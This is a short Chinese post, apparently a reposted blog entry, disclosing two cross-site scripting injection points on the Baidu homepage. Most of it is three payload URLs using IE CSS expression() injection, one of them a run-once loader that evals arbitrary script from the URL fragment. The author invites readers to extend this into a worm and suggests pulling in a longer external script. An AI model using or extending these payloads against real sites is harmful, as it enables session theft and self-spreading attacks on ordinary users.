来自梦之光芒
http://www.baidu.com/index.php?tn="/**/style=xss:expression(alert('xss'));
http://www.baidu.com/index.php?bar="/**/style=xss:expression(alert('xss'));
Run Once:http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#alert%28%29
.
明天考试,就不玩了,
百度首页两个XSS点一个Worm原型
,电脑资料
《百度首页两个XSS点一个Worm原型》(https://www.unjs.com)。懂JS的应该明白我的意图是什么,可以试着完善下。代码如果太长,就通过CreateElement调用个JS文件过来。另外也算顺便提醒百度下,呵呵。